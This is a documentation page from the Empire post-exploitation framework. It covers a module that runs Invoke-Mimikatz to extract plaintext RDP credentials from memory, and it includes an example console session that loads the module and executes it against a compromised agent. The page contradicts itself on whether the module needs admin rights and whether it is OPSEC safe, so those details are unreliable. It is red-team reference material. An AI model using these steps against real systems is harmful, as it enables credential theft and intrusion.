Invoke-Mimikatz Dump Terminal Server Passwords - Empire Module


This page contains detailed information about how to use the powershell/credentials/mimikatz/terminal_server Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Invoke-Mimikatz Dump Terminal Server Passwords
Module: powershell/credentials/mimikatz/terminal_server
Source code [1]: empire/server/modules/powershell/credentials/mimikatz/terminal_server.yaml
Source code [2]: empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1
MITRE ATT&CK: T1003, T1081, S0002
Language: PowerShell
Needs admin: Yes
OPSEC safe: Yes
Background: Yes

The terminal_server module runs PowerSploit's Invoke-Mimikatz function to extract plaintext RDP credentials from memory.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the terminal_server module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the terminal_server module:

Agent
Agent to run module on.

Terminal_server Example Usage


Here's an example of how to use the terminal_server module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/credentials/mimikatz/terminal_server

 Author       @JosephBialek                                                        
              @gentilkiwi                                                          
 Background   True                                                                 
 Comments     https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210531   
              https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from- 
              svchost-exe/                                                         
 Description  Runs PowerSploit's Invoke-Mimikatz function to extract plaintext RDP 
              credentials from memory.                                             
 Language     powershell                                                           
 Name         powershell/credentials/mimikatz/terminal_server                      
 NeedsAdmin   True                                                                 
 OpsecSafe    True                                                                 
 Software     http://attack.mitre.org/software/S0002                               
 Techniques   http://attack.mitre.org/techniques/T1003                             
              http://attack.mitre.org/techniques/T1081                             


,Record Options-,----------,-------------------------,
| Name  | Value | Required | Description             |
|-------|-------|----------|-------------------------|
| Agent |       | True     | Agent to run module on. |
'-------'-------'----------'-------------------------'

(Empire: usemodule/powershell/credentials/mimikatz/terminal_server) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/credentials/mimikatz/terminal_server) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Authors


References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.